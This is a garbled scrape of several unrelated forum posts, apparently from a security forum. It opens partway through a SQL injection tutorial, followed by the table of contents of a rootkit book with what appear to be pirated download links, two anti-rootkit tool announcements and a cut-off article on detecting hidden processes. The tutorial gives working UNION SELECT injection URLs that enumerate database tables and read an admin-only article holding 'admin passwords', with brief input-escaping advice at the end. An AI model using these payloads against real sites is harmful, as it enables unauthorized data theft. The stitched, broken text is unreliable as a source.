'text'. Again this is because we now are limiting the results from the server by row NR 2 and asks for the 1 next result(s). Alright, so the situation is: We want to check out a table called 'articles'. We got the table name from asking the table 'tables' in the database 'information_schema' The table 'articles' got these columns: ID | subject | text We got the column names from asking the table 'columns' in the database 'information_schema' for all column names in the table 'articles' Now! All we need to do is extract what we want. All through this table 99% likely is not interesting at all we now are gonna try to extract all the info out of article NR 23, this is because we act like that article is for admins only, but we want to read it anyway. To extract information you do like this: Code: [select] Evilzone - Hacking and Security Community - Index, subject, text)+FROM+articles+WHERE+ID=23 Now you will see a almost normal looking article, however the subject will still be “2”. But the text will now look like this(Lets say that the subject is “admin passwords” and the text is “abcabcabc”): Quote 23admin passwordsabcabcabc This is because we asked for the ID which is 23, then the subject which is "admin passwords" and then the text which is "abcabcabc". This is a bit messy.. So lets try to clean things up by splitting the 3 columns with a '<br /><br />': Code: [select] http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,concat(ID,'<br /><br/>',subject,'<br /><br />',text,'<br /><br />')+FROM+articles+WHERE+ID=23(Remember the HEX thing? Most likely you will have to use that here.) HEX version: Code: [select] Evilzone - Hacking and Security Community - Index Now you will see this: Quote 23 admin passwords abcabcabc I know this information wasn't all that interesting but this is basically how you do it! Lets say you want to check if the database got a user information table. Then you simply use the limit command on the: Quote http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,concat(table_name)+FROM+information_schema.tables+WHERE+table_schema='DatabaseName' OR Quote http://evilzone.org/index.php?id=17+UNION+ALL+SELECT+1,2,concat(table_name)+FROM+information_schema.tables+WHERE+table_schema=database() And repeat the whole process all over again. Okay. I have a confession to make. The method you guys learned now is the very hard way. But I wanted you to know how to do it that way because sometimes its necessary. And I know you would have just skipped to the easy version if I told you earlier To now we have used the concat() function to group up different columns into one. But this does not limit the amount of rows the SQL server returns. So (depending on the PHP code) we will only get the first row of the returned results printed to the page. Depending on the PHP code, if it is coded in such a way that it will only output the first row or if it will loop thought all the rows and print them out. Either way, I will introduce you to a new function. The group_concat() function. This will not only allow you to group up multiple columns and values into one, but also grouping up rows so you don't have to use the LIMIT at the end and send a million requests. However, I must warn you. The group_concat default max length is only 1024 characters. Thats why its very often necessary doing it the hard way, with LIMIT. If the returned value is more than 1024 characters the rest will just be discarded. nonetheless. This is how you do it: Remember the 'article' table from above? Well, lets try getting all its column names from the 'information_schema.columns' instead of doing LIMIT: Code: [select] Evilzone - Hacking and Security Community - Index' This should now return as: Quote ID,subject,text Now we have gotten the same amount of information that we had to send three requests for last time in one request! This method can be used in all the other queries above to. 1.5 Securing vulnerabilities What every PHP coder(and any other web page coder) should ALWAYS do: strip/check/secure ALL user inputs! Instead of doing: Code: [select] $variable = $_GET['Some_user_input_name']; Do: Code: [select] $variable = mysql_real_escape_string($_GET['Some_user_input_name']); The mysql_real_escape_string() function will prohibit any escape character (' or " or \ etc) to do any damage. And therefore an injection is impossible. And remember to use ' around the variable like this: Code: [select] db_query("SELECT * FROM Somewere WHERE Something='".$variable."'); Use of the is_numeric() function where the inputs are always going to be numbers either way is also a good idea. And also check the number length, your number should never be so high that it stats using e's (51.315+315e). So a simple if (num > 99999999999) {die;} will work fine. Other inputs are: Quote $_POST[''] $_COOKIE[''] $_FILES[''] $_REQUEST[''] $_SESSION[''] It is so god damn easy so why people do not do it is a mystery to me. Sursa: SQL Injection

The Rootkit Arsenal Escape and Evasion in the Dark Corners of the System Reverend Bill Blunden Preface: Metadata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . XIX Part 1- Foundations Chapter 1 Chapter 2 Setting the Stage . ........ ..... .. .. . 1.1 Forensic Evidence 1.2 First Principles. . . . . . . . . . . . . . . . . . . . . . Semantics ....... ... ... ......... .. . Rootkits: The Kim Philby of System Software . . . . Who Is Using Rootkit Technology? The Feds .. The Spooks .... .. . The Suits .... ... . 1.3 The Malware Connection. Infectious Agents . . . Adware and Spyware . . . Rise of the Botnets . . . . Malware versus Rootkits . Job Security: The Nature of the Software Industry . 1.4 Closing Thoughts. . . . . . . . . . . . . . . Into the Catacombs: IA-32 . . . . . . . . . . . . . . 2.1 IA-32 Memory Models. Physical Memory . . . . . . Flat Memory Model. . . . . Segmented Memory Model Modes of Operation. . 2.2 Real Mode. . . . . . . . . . Case Study: MS-DOS .... Isn't This a Waste of Time? Why Study Real Mode? . The Real-Mode Execution Environment Real-Mode Interrupts .. .... .. . Segmentation and Program Control . . . Case Study: Dumping the IVT . . . . . . Case Study: Logging Keystrokes with a TSR . Case Study: Hiding the TSR . . . . . . . . . . · ..... 3 .3 · . ..... 8 · . .. ... 9 .. 11 · 13 · 13 · 13 · 15 · 15 · 16 · 17 · 17 · 19 · 19 · 21 ... . 23 . 24 · 25 . 27 · 27 . 28 .29 . 30 . ..... 32 . 33 · 35 .38 .40 · 41 .45 v (ontents Chapter 3 vi Case Study: Patching the tree.com Command Synopsis ........ .... ..... .. . . 2.3 Protected Mode. . . . . . . . . . . . . . . . . The Protected-Mode Execution Environment. Protected-Mode Segmentation ..... . Protected-Mode Paging ......... . Protected-Mode Paging: A Closer Look . 2.4 Implementing Memory Protection .... Protection through Segmentation . . . . Limit Checks . . . Type Checks . . . . . . . . . . Privilege Checks. . . . . . . . Restricted-Instruction Checks Gate Descriptors . . . . . . . . . Protected-Mode Interrupt Tables Protection through Paging . . Summary . .............. . Windows System Architecture . • . . . • • . . . . . 3.1 Physical Memory . . . . . . . . . . Physical Address Extension (PAE) . . . Data Execution Prevention (DEP) .... Address Windowing Extensions (AWE) . Pages, Page Frames, and Page Frame Numbers 3.2 Memory Protection . Segmentation . . . . . . . . . . . . . .. .... . Paging . . . . . . . . . . . . . . . . . .. . ... . Linear to Physical Address Translation . Longhand Translation . . . A Quicker Approach . . . . Another Quicker Approach 3.3 Virtual Memory . . . . . . . . User Space Topography . ... Kernel Space Dynamic Allocation . Address Space Layout Randomization (ASLR) . 3.4 User Mode and Kernel Mode . How versus Where . . . . Kernel-Mode Components User-Mode Components 3.5 The Native API .. .. . . The IVT Grows Up ... . Hardware and the System Call Mechanism System Call Data Structures . . The SYSENTER Instruction. . . . . . . .... 50 .. .. 53 · .54 .54 .57 · 61 .63 . 66 · 67 .67 · .68 .68 .69 .70 · 73 . 74 .76 ..... 79 .80 · 81 .82 .82 .83 .83 .84 .86 · 91 · 91 .92 .93 .93 .96 · .97 · .98 100 100 101 103 · 105 · 106 · 107 108 . ..... 109 Chapter 4 The System Service Dispatch Tables . Enumerating the Native API . . . Nt*O versus Zw*O System Calls. The Life Cycle of a System Call . Other Kernel-Mode Routines . .. Kernel-Mode API Documentation 3.6 The Boot Process . . . . . . Startup for BIOS Firmware . . Startup for EFI Firmware. . . The Windows Boot Manager . The Windows Boot Loader . Initializing the Executive. The Session Manager . Wininit.exe. . . . . Winlogon.exe. . . . The Major Players. 3.7 Design Decisions . How Will Our Rootkit Execute at Run Time? . What Constructs Will Our Rootkit Manipulate? . Rootkit Basics . . . . 4.1 Rootkit Tools .... Development Tools Diagnostic Tools . . Reversing Tools . . Disk Imaging Tools Tool Roundup. . . . 4.2 Debuggers. . . . . Configuring Cdb.exe . Symbol Files . . . Windows Symbols. Invoking Cdb.exe . . Controlling Cdb.exe . Useful Debugger Commands. Examine Symbols Command (x) . List Loaded Modules (1m and !lmi) Display Type Command (dt) . Unassemble Command (u) . Display Command (d*) . . . Registers Command (r) .. . The Kd.exe Kernel Debugger Different Ways to Use a Kernel Debugger . . Configuring Kd.exe . . . . Preparing the Hardware . . . . . . . . . . Contents 110 113 114 116 119 122 124 124 126 126 127 130 132 134 134 · 134 · 136 137 · . 138 .... 141 142 · 142 · 143 · 144 145 147 148 150 · 150 · 151 · 153 · 154 · 155 155 157 158 158 159 161 161 · . 162 · 164 · . 164 vii Contents viii Preparing the Software. . . . . . . . . . ' . Launching a Kernel Debugging Session . . . Controlling the Target. . . . . . . . . . . . . Useful Kernel-Mode Debugger Commands .. List Loaded Modules Command (1m) !process ... ... ... . . Registers Command (r) .. . Working with Crash Dumps . . Method 1 . ..... . Method 2 ..... .. . Crash Dump Analysis .. 4.3 A Rootkit Skeleton. . . . . Kernel-Mode Driver Overview. A Minimal Rootkit . Handling IRPs . DeviceType . Function . Method .. . Access .. . . Communicating with User-Mode Code Sending Commands from User Mode Source Code Organization .. . Performing a Build ... ... . WDK Build Environments . Build.exe ... ...... . 4.4 Loading a KMD . .... .. . The Service Control Manager (SCM) . Using sC.exe at the Command Line . Using the SCM Programmatically . Registry Footprint . . . . . . . . . . ZwSetSystemInformationO. . . . . . . . . Writing to the \Device\PhysicaIMemory Object. Modifying Driver Code Paged to Disk . Leveraging an Exploit in the Kernel . 4.5 Installing and Launching a Rootkit. . . Launched by the Operating System . . Launched by a User-Mode Application. Use the SCM . ...... ... .... ... .. . . .. 166 168 169 170 170 · .. .. 171 · . .. . 173 · .... 173 · 174 · 175 175 176 176 178 181 · 185 · 186 · 186 · 186 187 190 193 194 194 · 195 198 · 198 · 199 .200 .202 . 203 . 208 .208 · 210 · 210 · 211 · 212 . . . . . . . 212 Use an Auto-Start Extensibility Point (ASEP) .. ....... 213 Install the Launcher as an Add-On to an Existing Application . 215 Defense in Depth . . . 216 Kamikaze Droppers . . 216 Rootkit Uninstall. . . . 219 Contents 4.6 Self-Healing Rootkits ..... . ... . .. .. .... .... .. 220 Auto-Update . . . . . ..... . . .... . .. ... .. .. ... 224 4.7 Windows Kernel-Mode Security . .. . . .... ... . . .. . . 225 Kernel-Mode Code Signing (KMCS) .... . ... .... .... 225 Kernel Patch Protection (KPP) . . . . . . . . . . . . . . . . . . . 229 Restricted Access to \Device\PhysicaIMemory . . . . . . . . . . 230 4.8 Synchronization . . . . . . . . . . . . . . . . . . . . . .. . . 230 Interrupt Request Levels . . . . . . . . . . .. . .. 230 Deferred Procedure Calls (DPCs) . . . . . .. ... . . . . . 234 Implementation . . . . 235 4.9 Commentary. . . . . . . . . . . . . . . . . . . . . ... . . .. 240 Part II - System Modification Chapter 5 Hooking Call Tables. . . . . . . . . . . . . . . . . . . . . . 243 5.1 Hooking in User Space: The lAT .... . . . . ... . . . . . . . 245 DLL Basics ........ ..... . .... .. ... .. ..... 246 Accessing Exported Routines. . . . .. . 247 Load-Time Dynamic Linking . . . . . . 248 Run-Time Dynamic Linking . . . .. . 249 Injecting a DLL . . . . . . . . . . . 250 The AppInit_DLLs Registry Value. . 250 The SetWindowsHookExO API Call . . 251 Using Remote Threads . . . . . . . . . 252 PE File Format . . . . . . . . . . . . . . . 255 The DOS HEADER. .... .. . .... .. . .. .. 255 RVAs .... ..... . .. . .... . ...... . . .... .. 256 The PE Header . . . . . . . . . . . . . . . . . . . . . . . . . . 257 Walking through a PE on Disk . . . . . . . . . . . . . . . . . . 260 Hooking the IAT .... .... . ... . ... . .... .... 265 5.2 Hooking in Kernel Space . . . . . . . . . . . . . . . . . . 269 Hooking the IDT. . . . . . . . . . . . . . . . . . . . . . . . . . . 270 Handling Multiple Processors - Solution 1 . . . . . . . . . . 271 Naked Routines . . . . . . . . . . . . . . . . . . . . . . . . . . 276 Issues with Hooking the IDT . . . . . . . . . . . . . . . . . . 278 Hooking Processor MSRs . . . . . . . . . . . . . . 279 Handling Multiple Processors - Solution 2 . . 282 Hooking the SSDT. . . . . . . . . . . . . . 286 Disabling the WP Bit - Technique 1 . . 288 Disabling the WP Bit - Technique 2 . . 289 Hooking SSDT Entries . . . . . . . . . . 291 SSDT Example: Tracing System Calls. . ... 293 SSDT Example: Hiding a Process. . . . . . . . . . . .... 296 ix Contents Chapter 6 x SSDT Example: Hiding a Directory . . . . . . . SSDT Example: Hiding a Network Connection. Hooking IRP Handlers . . . . . . . . . . . Hooking the GDT - Installing a Call Gate 5.3 Hooking Countermeasures . . . . . Checking for Kernel-Mode Hooks. Checking IA32 _ SYSENTER EIP. Checking INT Ox2E . . . Checking the SSDT . . . . . . . Checking IRP Handlers . . . . . Checking for User-Mode Hooks Parsing the PEB - Part 1. . Parsing the PEB - Part 2. . 5.4 Counter-Countermeasures . Patching System Routines. . . . . . . . . Binary Patching versus Run-time Patching The Road Ahead . . 6.1 Run-time Patching. Detour Patching . . Detour Jumps ... Example 1: Tracing Calls Detour Implementation. Acquire the Address of the NtSetValueKeyO . Initialize the Patch Metadata Structure . . . . · 301 .305 . 306 . 308 · 317 · 318 · 321 . 322 . 324 . 325 .327 .330 .336 .337 . .. . 339 . 340 .340 .340 · 341 .344 . 346 · 351 .354 .354 Verify the Original Machine Code against a Known Signature . 356 Save the Original Prolog and Epilog Code. Update the Patch Metadata Structure. . . Lock Access and Disable Write Protection Inject the Detours . The Prolog Detour . The Epilog Detour . Post-Game Wrap-Up Example 2: Subverting Group Policy. . . Detour Implementation. . . . . . . . . Initializing the Patch Metadata Structure . The Epilog Detour . . . . . . . . . . . . . Mapping Registry Values to Group Policies. Example 3: Granting Access Rights . . . Detour Implementation. . . . . . . . . . 6.2 Binary Patching . . . . . . . . . . . . . . . Subverting the Master Boot Record . . . . The MBR in Depth . The Partition Table . . . . . . . . . . . . . 357 . 357 .358 .358 .359 · 361 . 365 · ... 365 . 367 · . . . 367 · . . . 368 .373 . 374 . 376 . 379 .380 .380 . . 383 Patch or Replace? ... . .. . Hidden Sectors . . . . . . . . . Bad Sectors and Boot Sectors . Rogue Partition . MBR Loader ... IA-32 Emulation. . Vbootkit ... .. . 6.3 Instruction Patching Countermeasures . Contents .386 . 387 . 388 . 389 . 390 . 393 . 395 .399 Chapter 7 Altering Kernel Objects. . . . . . . . . . . . . . . . . . . . 401 7.1 The Cost of Invisibility . . . . . . . . 401 Issue 1: The Steep Learning Curve . . . . . 401 Issue 2: Concurrency . . . . . . . . . . . . . 402 Issue 3: Portability and Pointer Arithmetic . 403 Branding the Technique: DKOM . . . . . . . 405 Objects? ...... ... .. ... .. . ... .. ... . . ... 405 7.2 Revisiting the EPROCESS Object . . 406 Acquiring an EPROCESS Pointer . 406 Relevant Fields in EPROCESS . . 409 UniqueProcessId . . . 409 ActiveProcessLinks. . 410 Token . . . . . . . . . 411 ImageFileName . . . . 411 7.3 The DRIVER_SECTION Object. . 411 7.4 The TOKEN Object . . . . . . . 414 Authorization on Windows . . . . . 414 Locating the TOKEN Object. . . . 416 Relevant Fields in the TOKEN Object . . 418 7.5 Hiding a Process. . . . . . . . . . 422 7.6 Hiding a Driver . . . . . . . . . . 428 7.7 Manipulating the Access Token. . 432 7.8 Using No-FU . . . . . . . 434 7.9 Countermeasures . . . . . . . . . 436 Cross-View Detection . . . . . . . 436 High-Level Enumeration: CreateToolhelp32SnapshotO . . 437 High-Level Enumeration: PID Bruteforce . 439 Low-Level Enumeration: Processes. . 442 Low-Level Enumeration: Threads. . 444 Related Software. . . . . . . . 451 Field Checksums. . . . . . . . . . . . . 452 Counter-Countermeasures . . . . . . . 452 7.10 Commentary: Limits of the Two-Ring Model . 453 7.11 The Last Lines of Defense . . . . . . . . . . . 454 xi (ontents Chapter 8 Deploying Filter Drivers. . . . . . . . . . . . . . . . 8.1 Filter Driver Theory. . . . . . . . Driver Stacks and Device Stacks. . . . . . The Lifecycle of an IRP . . . . . . . . . . . Going Deeper: The Composition of an IRP IRP Forwarding . . . . . . . . . . IRP Completion . . . . . . . . . . . . . . . 8.2 An Example: Logging Keystrokes . . . . . The PS/2 Keyboard Driver and Device Stacks . Lifecycle of an IRP. . . . . . . . . . . . . . . Implementation . . . . . . . . . . . . . . . . 8.3 Adding Functionality: Dealing with IRQLs. Dealing with the Elevated IRQL . . Sharing Nicely: The Global Buffer . The Worker Thread . . . . . . . . . Putting It All Together . . . . . . . 8.4 Key Logging: Alternative Techniques . Set WindowsHookEx. . . . . . . . GetAsyncKeyState . . . . . . . . 8.5 Other Ways to Use Filter Drivers Part 111 - Anti-Forensics Chapter 9 xii Defeating Live Response . . . . . . . . . . . . . . . IDS, IPS, and Forensics . . Anti-Forensics .... Data Destruction . . Data Hiding . . . . . Data Transformation Data Contraception. Data Fabrication ... File System Attacks 9.1 The Live Incident Response Process The Forensic Investigation Process Collecting Volatile Data . . . Performing a Port Scan . . . . . . Collecting Nonvolatile Data .. .. The Debate over Pulling the Plug Countermeasures . . . . . . 9.2 RAM Acquisition .... .... . Software-Based Acquisition .. . KnTDD.exe. Autodump+ ..... . . .. . ... . 457 .458 .458 .460 . 461 .464 .465 .467 .467 .469 .470 . 475 .475 .477 .479 .483 . 484 .485 .488 .489 . . . . 493 . 494 .495 .496 . 496 .497 .497 .497 .497 .498 .498 .500 .504 .505 .508 .508 · . 509 · . 510 . 510 · .511 Chapter 10 LiveKd.exe . . . . . . . . . Crash Dumps . . . . . . . . Hardware-Based Acquisition. Countermeasures . . . . . . . Defeating File System Analysis. . . . . . 10.1 File System Analysis . .. Forensic Duplication . . . . Recovering Deleted Files . Enumerating ADSes . . . . Acquiring File Metadata . . Removing Known Good Files. File Signature Analysis . . . . Static Analysis of an Unknown Executable Run-time Analysis of an Unknown Executable 10.2 Countermeasures: Overview . .. . .. . 10.3 Countermeasures: Forensic Duplication . Reserved Disk Regions . . . . . . . . . . Live Disk Imaging. . . . . . . . . . . . . 10.4 Countermeasures: Deleted File Recovery. 10.5 Countermeasures: Acquiring Metadata Altering Timestamps . . . . . . . . . . . . Altering Checksums . . . . . . . . . . . . . 10.6 Countermeasures: Removing Known Files Move Files into the "Known Good" List . Introduce "Known Bad" Files . .. .. . . Flood the System with Foreign Binaries . Keep Off a List Entirely by Hiding . Out-of-Band Hiding .. . . .. . In-Band Hiding .. . . ... .... . Application Layer Hiding: M42 . . . 10.7 Countermeasures: File Signature Analysis 10.B Countermeasures: Executable Analysis . Foiling Static Executable Analysis . Cryptors ...... .. .. . . Encryption Key Management. . . . Packers . ....... .. . . . .. . Augmenting Static Analysis Countermeasures Foiling Run-time Executable Analysis . Attacks against the Debugger. . . . . Breakpoints . . . . . . . . . . . . . . Detecting a User-Mode Debugger . . Detecting a Kernel-Mode Debugger. Detecting a User-Mode or Kernel-Mode Debugger Contents · 513 · 513 · 514 · 515 ... . 517 · 517 · 519 · 521 · 521 . 523 .527 . 529 . 530 · 533 .537 · 538 .538 . 539 · 542 . 544 .544 .546 · 547 · 547 .548 . 548 . 549 . 549 . 555 .566 · 567 .568 .568 .571 . 580 · 581 · 583 · 585 .586 . 586 · 587 . 588 · 588 xi ii (ontents Chopter 11 xiv Detecting Debuggers via Code Checksums. . Land Mines .. . ...... . Obfuscation .......... . . Obfuscating Application Data. Obfuscating Application Code The Hidden Price Tag . . . . 10.9 Borrowing Other Malware Tactics . Memory-Resident Rootkits .... . Data Contraception . . . . . . . . . The Tradeoff: Footprint versus Failover . Defeating Network Analysis . . . . • . . . . . . . . 11 .1 Worst-Case Scenario: Full Content Data Capture .... 11 .2 Tunneling: An Overview . HTTP. DNS ........ . ICMP ....... . Peripheral Issues . 11.3 The Windows TCPIIP Stack Windows Sockets 2 . Raw Sockets . . . . . Winsock Kernel API . NDIS ...... . . . Different Tools for Different Jobs. 11 .4 DNS Tunneling. DNS Query . ... ....... . DNS Response . . . . . . . . . . 11.5 DNS Tunneling: User Mode ... 11 .6 DNS Tunneling: WSK Implementation. Initialize the Application's Context. .. Create a Kernel-Mode Socket . .... Determine a Local Transport Address . Bind the Socket to the Transport Address. Set the Remote Address (the C2 Client). Send the DNS Query . . . . Receive the DNS Response. . . . . . . . 11.7 NDIS Protocol Drivers . . . . . . . . . . Building and Running the NDISProt 6.0 Example. An Outline of the Client Code An Outline of the Driver Code The ProtocolxxxO Routines. Missing Features. . . . . . . . · 589 .590 .590 · 591 · 592 . 595 . 596 . 596 · 597 . 599 . . . . 603 . . . . . 604 . 605 .606 .607 .607 .609 · 610 .611 · 612 · 613 · 614 · 616 · 617 · 617 · 619 · 621 · 625 .632 .632 · 634 · 635 · 636 . 638 .639 · 641 · 642 . 646 .649 .652 .656 Chapter 12 Countermeasure Summary . . . 12.1 Live Incident Response . 12.2 File System Analysis . . 12.3 Network Traffic Analysis 12.4 Why Anti-Forensics? .. Port IV - End Material Chapter 13 Chapter 14 Appendix The Tao of Rootkits . . . . . . . Run Silent, Run Deep . . . . . . Development Mindset. . . . . . On Dealing with Proprietary Systems . Staking Out the Kernel . . . . . . . . . Walk before You Run: Patching System Code . Walk before You Run: Altering System Data Structures The Advantages of Self-Reliant Code Leverage Existing Work Use a Layered Defense .. . .. . Study Your Target . . . . . . . . . Separate Mechanism from Policy . Closing Thoughts . . . . . . . . . . . . . Chapter 2 ..... . . Project: KillDOS. . Project: HookTSR . Project: HideTSR . Project: Patch Chapter 3 . SSDT .. . . Chapter 4 ... . Project: Skeleton (KMD Component). Project: Skeleton (User-Mode Component) Project: Installer . Project: Hoglund. . . . . . . . . . . Project: SD .... . . .. .. .. . . Project: HBeat (Client and Server) . Project: IRQL . . . . . . Chapter 5 . ..... . . . . Project: RemoteThread . Contents · . . . 659 .660 . 662 . 663 .664 · .. . 669 . 669 . 670 · 670 .671 · 672 ... 672 · 673 · 675 · 675 . 676 · 676 · .. . 677 . 683 . 683 . 684 · 691 . 696 . 697 . 697 .710 · 710 · 714 · 721 . 724 .726 · 729 . 736 . 739 · 739 xv Contents xvi Project: ReadPE .. .. . ..... . .. .... ... 741 Project: HookIAT . . .... ... . . 746 Project: HookIDT . . . . . . . 750 Project: HookSYS . . . . . . . 756 Project: HookSSDT . . 760 Project: HookIRP . . . . . . . . . . 772 Project: HookGDT . .. ... . .. . 774 Project: AntiHook (Kernel Space and User Space) . . . . . . . . 779 Project: ParsePEB. . . . . . . . . . . . . . . . . . . . .. . . 790 Chapter 6 . . . . . . . . . . . . . . . . . . . . . . . . . . .. .. 793 Project: TraceDetour . . . . . 793 Project: GPO Detour . . . . . . . . 801 Project: AccessDetour. . . . . . . . . . 804 Project: MBR Disassembly . . . . . . . . . . . . 811 Project: LoadMBR. . . . . . . . . . . . . . . . . 813 Chapter 7 . . . . . . . . . . . .. ... .. .. . ... . .... 816 Project: No-FU (User-Mode Portion) .. .... . .... . .. . 816 Project: No-FU (Kernel-Mode Portion) . ... ... ....... 821 Project: TaskLister . . . 834 Project: findFU . . . . .. ... ............... . 838 Chapter 8 . . . . . . . . . .. .. ..... ...... . ... . . 843 Project: KiLogr-VOl . . . . .. . . . . .... . 843 Project: KiLogr-V02. . . .. ... .. . ..... 847 Chapter 10 . . . . . . . . . .. . . . .. . . . . . . 854 Project: TSMod . . . . . . . . . . 854 Project: Slack .. . . . . . . . . . 858 Project: MFT . . . . . . . . . . 860 Project: Cryptor . .. . . . . . . . . 871 Chapter 11 . . . .. .. . . . . . . . . 876 Project: UserModeDNS . . 876 Project: WSK-DNS . ....... . .... ... .. ... . .. 883 Index . ............. . . .. . 895 Download: http://www.mediafire.com/?7jl44499d94l3l9 http://www.megaupload.com/?d=C4TS6FFB Stiu ca mai e postata pe undeva pe aici, dar link-ul nu mai e valid iar cartea asta se merita descarcata.

[h=3]RootRepeal - New Rootkit Detector Tool[/h] RootRepeal is new kernel land based Anti-Rootkit tool which is simple to use yet powerful. Currently it is in beta version and as of now support only x86 systems. Main features Driver Scan - scans the system for kernel-mode drivers. Displays all drivers currently loaded, and shows if a driver has been hidden, and whether the driver's file is visible on-disk. Files Scan - scans any fixed drive on the system for hidden, locked or falsified* files. Processes Scan - scans the system for processes. Displays all processes currently running, and shows if a processes is hidden or locked. SSDT Scan - shows whether any of the functions in the System Service Descriptor Table (SSDT) are hooked. Stealth Objects Scan - attempts to determine if any rootkits are active by looking for typical symptoms. Hidden Services Scan - scans for hidden system services. Shadow SSDT Scan - counterpart to the SSDT Scan, but deals mostly with graphics and window-related functions. Due to nature of these kind of tools, you are always advised to have backups of all important data before running it. Also it is advised to run it on Virtual machines such as Vmware. For more interesting details and test it yourself, visit the project page of RootRepeal Download: http://ad13.geekstogo.com/RootRepeal.rar Sursa: SecurityXploded Forum • View topic - RootRepeal - New Rootkit Detector Tool

[h=3]Anti-Rootkit Tool - Tuluka Kernel Inspector[/h] Here's the new Anti-Rootkit tool - "Tuluka Kernel Inspector" - by Libertad from Tuluka.org. It has following core features Detects hidden processes, drivers and devices Detects IRP hooks Identifies the substitution of certain fields in DRIVER_OBJECT structure Checks driver signatures Detects and restores SSDT hooks Detects suspicious descriptors in GDT IDT hook detection SYSENTER hook detection Displays list of system threads and allows you to suspend them IAT and Inline hook detection Shows the actual values of the debug registers, even if reading these registers is controlled by someone Allows you to find the system module by the address within this module Allows you to display contents of kernel memory and save it to disk Allows you to dump kernel drivers and main modules of all processes Allows you to terminate any process Is able to dissasemble interrupt and IRP handlers, system services, start routines of system threads and many more Allows to build the stack for selected device Many more.. It is tested on following operating systems (32-bit), Windows XP SP0 SP1 SP2 SP3 Windows Server 2003 SP0 SP1 SP2 R2 Windows Vista SP0 SP1 SP2 Windows Server 2008 SP0 SP1 SP2 Windows 7 SP0 SP1 Though it currently supports only 32 bit version, support for 64 bit is expected in upcoming versions. You can download it from here: http://www.tuluka.org/Download.html Sursa: SecurityXploded Forum • View topic - New Anti-Rootkit Tool - Tuluka Kernel Inspector

Hidden Rootkit Process Detection [TABLE] [TR] [TD=class: page_subheader]Contents[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Introduction to Rootkits Userland Rootkit & their Hidden Operations Hidden Userland Rootkit Process Detection Methods Direct NT System Call Implemenation HPD using PIDB (Process ID Bruteforce) method HPD with CSRSS Process Handle Enumeration [*] Other Methods of Detecting Hidden Processes [*] References [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Introduction to Rootkits [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Rootkits are one of the advanced species in today's every changing technical world. They are known for their sophisticated techniques to hide their presence often evading their detection from top notch Antiviruses and detection tools. Antivirus solutions often hit the wall when it comes to Rootkit detection and there is a greater need for dedicated Anti-Rootkit tools. Rootkits use combination of user land and kernel level techniques to evade their detection. In this article we will throw light on how userland Rootkits work under the hood and different techniques which can be used to detect such Rootkits. Though these methods are effective only against user land Rootkits, in some cases they can even detect kernel based Rootkits unless they haven't taken proper care to remove all those traces. [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader]Userland Rootkits & their Hidden Operations [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Userland Rootkits use different techniques to hide their process and to prevent its termination. One such method is to hook the NtOpenProcess function (OpenProcess API internally calls NtOpenProcess) and return negative result whenever Anti-Rootkit application try to open such process. As a result Rootkit process will remain hidden from any process viewer tools. This is just one of the method and often you will find more such internal functions such as NtQuerySystemInformation being hooked to filter out their process from the list. [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Hidden Userland Rootkit Process Detection Methods [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Detection of hidden process is equally challenging as Rootkit can employ one or more methods to cover its presence. Here are some of the very effective methods to detect such userland Rootkit processes. All these detection methods work on common approach. First they get the list of all running processes using standard API functions such as EnumProcesses or Process32First. Then one or more special methods mentioned below are used to enumerate the processes. Finally this new process list is compared with previously obtained list and any new process found in this new list is detected as hidden rootkit process. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]HPD using Direct NT System Call Implemenation [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] This is very effective method to detect any hidden userland rootkit processes. One of the lesser-known methods of enumerating the processes is to use NtQuerySystemInformation function by passing first parameter as SystemProcessesAndThreadsInformation. The drawback of this method is that it can be easily circumvented by hooking the NtQuerySystemInformation function and then by tampering with the results. The NtQuerySystemInformation is basically stub having few lines of code to transition from user to kernel land. It finally calls the NtQuerySystemInformation function within the kernel. So the trick here is to implement the NtQuerySystemInformation without directly calling the function. Here is the sample code that shows how one can directly implement NtQuerySystemInformation on various platforms. On Windows2000, INT 2E and from XP onwards 'sysenter' instruction is used to transition from user to kernel. [/TD] [/TR] [/TABLE] __declspec(naked) NTSTATUS __stdcall DirectNTQuerySystemInformation (ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength) { //For Windows 2000 if( OSMajorVersion == 5 && OSMinorVersion == 0 ) { __asm { mov eax, 0x97 lea edx, DWORD PTR ss:[esp+4] INT 0x2E ret 0x10 } } //For Windows XP if( OSMajorVersion == 5 && OSMinorVersion == 1 ) { __asm { mov eax, 0xAD call SystemCall_XP ret 0x10 SystemCall_XP: mov edx, esp sysenter } } //For Windows Vista & Longhorn if( OSMajorVersion == 6 && OSMinorVersion == 0 ) { __asm { mov eax, 0xF8 call SystemCall_VISTA ret 0x10 SystemCall_VISTA: mov edx, esp sysenter } } //For Windows 7 if( OSMajorVersion == 6 && OSMinorVersion == 1 ) { __asm { mov eax, 0x105 call SystemCall_WIN7 ret 0x10 SystemCall_WIN7: mov edx, esp sysenter } } } } [TABLE] [TR] [TD]This technique can discover any userland rootkit process and only way for rootkit process to defeat against this technique is to move into kernel. However, due to low-level implementation, there is slight risk in using this method in production code.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]HPD using PIDB (Process ID Bruteforce) method [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] This method was first used by BlackLight and it turned out to be very effective yet simple. Here, it enumerates through process id from 0 to 0x41DC and then check if that process exist by calling OpenProcess function. Then this list of discovered processes are compared with normal process list got using standard enumeration functions (such as Process32First, EnumProcesses functions). During the testing, it is found that some process id on server machines were more than magic number 0x41DC. So in 